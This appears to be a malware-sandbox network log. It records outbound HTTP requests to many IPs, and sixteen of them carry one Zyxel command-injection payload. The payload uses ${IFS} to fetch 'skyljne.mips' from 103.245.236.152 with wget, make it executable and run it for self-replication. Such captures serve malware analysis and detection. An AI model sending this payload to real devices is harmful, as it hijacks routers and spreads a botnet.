                                        Jan 14, 2024 16:19:03.908413887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9548192.168.2.1338556129.191.161.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.908464909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9549192.168.2.1340640101.43.29.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.908530951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9550192.168.2.1349248167.53.167.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.908586025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9551192.168.2.1333584142.9.202.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.908675909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9552192.168.2.134602819.220.8.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.908731937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9553192.168.2.1358996112.158.209.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.908802986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9554192.168.2.1350206196.111.245.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.908828974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9555192.168.2.1358282104.232.45.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.908926010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9556192.168.2.1354954184.236.205.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.908972979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9557192.168.2.13553104.132.75.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.909034967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9558192.168.2.134693617.128.91.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.909075975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9559192.168.2.1333822144.123.58.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.909121037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9560192.168.2.1359302163.30.52.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.909187078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9561192.168.2.135346681.240.31.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.909275055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9562192.168.2.1336148111.182.43.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.909331083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9563192.168.2.135678234.32.164.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9564192.168.2.135598490.193.78.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9565192.168.2.1337024152.48.255.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9566192.168.2.135394012.239.64.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9567192.168.2.133958451.138.50.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9568192.168.2.1334112181.55.200.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9569192.168.2.1342600210.160.171.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9570192.168.2.134793246.98.230.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9571192.168.2.134198617.7.176.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9572192.168.2.135316674.247.121.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9573192.168.2.133298419.17.134.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9574192.168.2.135854469.202.111.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9575192.168.2.1353986219.41.18.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9576192.168.2.136094461.229.66.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9577192.168.2.135569243.108.120.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9578192.168.2.1341604213.201.200.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9579192.168.2.135055495.239.222.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9580192.168.2.1346768202.163.157.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9581192.168.2.135512691.138.156.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9582192.168.2.1341820152.170.143.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9583192.168.2.133918624.176.62.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9584192.168.2.1342640111.95.166.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9585192.168.2.1353366203.245.20.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9586192.168.2.1341536136.24.0.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9587192.168.2.13505282.104.146.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9588192.168.2.135173076.180.205.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9589192.168.2.1347240149.148.162.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9590192.168.2.135819435.188.227.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9591192.168.2.1347952105.120.201.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9592192.168.2.134910683.59.60.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9593192.168.2.135673461.85.33.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9594192.168.2.1335854166.217.61.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9595192.168.2.1342360122.207.51.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9596192.168.2.134688035.137.206.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9597192.168.2.134961834.83.67.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9598192.168.2.1359016190.165.96.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9599192.168.2.1352086171.124.205.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9600192.168.2.1357318220.246.167.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9601192.168.2.1357570188.15.185.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9602192.168.2.1360060174.103.125.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9603192.168.2.134689232.20.185.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9604192.168.2.1354178104.218.8.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9605192.168.2.135205686.55.86.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9606192.168.2.1359246147.9.116.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9607192.168.2.1359794115.67.134.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9608192.168.2.135090277.103.96.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9609192.168.2.135903669.114.117.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9610192.168.2.1342006188.127.188.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9611192.168.2.1338604160.65.237.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9612192.168.2.134638454.56.108.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9613192.168.2.1342830143.223.106.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9614192.168.2.13543162.9.15.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9615192.168.2.134075475.6.54.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9616192.168.2.1335410209.247.95.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9617192.168.2.1352928167.180.189.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9618192.168.2.133415054.87.41.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9619192.168.2.135092488.245.135.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9620192.168.2.133468068.6.15.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9621192.168.2.135778044.48.6.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9622192.168.2.134478660.46.57.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9623192.168.2.1335302144.107.247.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9624192.168.2.134514495.254.136.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9625192.168.2.1356158117.168.68.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9626192.168.2.1357978145.171.174.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9627192.168.2.134950642.208.24.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9628192.168.2.1337956108.192.167.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9629192.168.2.1333956138.2.62.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9630192.168.2.1346868158.81.250.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9631192.168.2.1345258199.10.208.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9632192.168.2.133727657.93.224.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9633192.168.2.135612423.153.50.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9634192.168.2.1337860133.167.251.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9635192.168.2.134421031.96.223.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9636192.168.2.1353734169.108.184.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9637192.168.2.1347550166.8.153.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9638192.168.2.1333694104.1.31.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9639192.168.2.133718440.227.71.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9640192.168.2.133340032.17.183.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9641192.168.2.134714075.174.188.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9642192.168.2.135305812.236.190.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9643192.168.2.135461080.28.230.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9644192.168.2.1353914177.232.116.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9645192.168.2.1343902184.245.248.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9646192.168.2.135767083.39.62.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9647192.168.2.1360816105.152.171.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9648192.168.2.134759038.168.164.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9649192.168.2.133888874.181.220.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9650192.168.2.1333532164.13.185.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9651192.168.2.134297239.6.92.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9652192.168.2.1347520193.54.195.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9653192.168.2.135211463.19.243.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9654192.168.2.1335230133.204.15.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9655192.168.2.1339528113.253.185.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9656192.168.2.133625889.245.130.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9657192.168.2.1360662208.86.47.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9658192.168.2.133661636.52.138.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9659192.168.2.1333794120.104.249.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9660192.168.2.133338686.68.218.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9661192.168.2.1342690181.14.226.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9662192.168.2.1343994111.175.96.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9663192.168.2.1339948123.211.156.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9664192.168.2.1342314221.100.102.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9665192.168.2.1345622205.59.34.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9666192.168.2.135183442.104.154.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9667192.168.2.134183869.75.155.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9668192.168.2.1346830201.193.140.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9669192.168.2.134063694.240.186.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9670192.168.2.1334090139.6.16.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9671192.168.2.1358862112.88.132.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9672192.168.2.13404401.122.105.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9673192.168.2.1336672129.60.70.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9674192.168.2.134917844.132.75.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9675192.168.2.1342492220.93.129.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9676192.168.2.1359030124.110.254.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9677192.168.2.1347464109.152.116.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9678192.168.2.1340572151.154.161.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9679192.168.2.135814846.118.205.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9680192.168.2.1342888149.143.111.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9681192.168.2.133650696.69.209.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9682192.168.2.133360061.89.165.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9683192.168.2.1338326150.74.81.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9684192.168.2.1359910137.43.232.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9685192.168.2.135015645.152.41.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9686192.168.2.1354174175.144.93.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9687192.168.2.135642071.118.215.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9688192.168.2.1356780171.241.98.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9689192.168.2.1347562216.205.129.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9690192.168.2.1337012216.154.14.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9691192.168.2.1341302194.245.246.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9692192.168.2.135939249.52.140.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9693192.168.2.1337788128.41.118.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9694192.168.2.1347976206.180.199.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9695192.168.2.1344346188.253.180.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9696192.168.2.1360498196.130.103.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9697192.168.2.1338924143.220.171.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9698192.168.2.13338605.6.247.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9699192.168.2.134777687.121.152.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9700192.168.2.135494831.154.244.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9701192.168.2.1359496115.133.226.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9702192.168.2.134864649.134.218.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9703192.168.2.135735424.83.74.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9704192.168.2.1353794101.64.59.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9705192.168.2.1359410123.145.80.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9706192.168.2.134910840.180.100.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9707192.168.2.134826892.106.152.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9708192.168.2.1335178169.30.142.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9709192.168.2.13539945.162.27.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9710192.168.2.135362892.152.214.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9711192.168.2.133578048.197.52.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9712192.168.2.1358712126.202.159.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9713192.168.2.13465588.50.159.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9714192.168.2.1340712178.209.71.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9715192.168.2.135252459.224.136.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9716192.168.2.134018470.161.8.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9717192.168.2.1334176171.89.41.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9718192.168.2.1348936211.206.30.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9719192.168.2.1359502164.8.153.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9720192.168.2.1360740180.43.192.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9721192.168.2.134306639.133.218.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9722192.168.2.1336788209.66.94.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9723192.168.2.135459467.57.27.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9724192.168.2.135167681.192.54.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9725192.168.2.1345568155.29.176.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9726192.168.2.1332814111.193.36.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9727192.168.2.134048240.89.239.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9728192.168.2.1342890134.6.174.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9729192.168.2.134379090.194.79.214443
                                        TimestampBytes transferredDirectionData


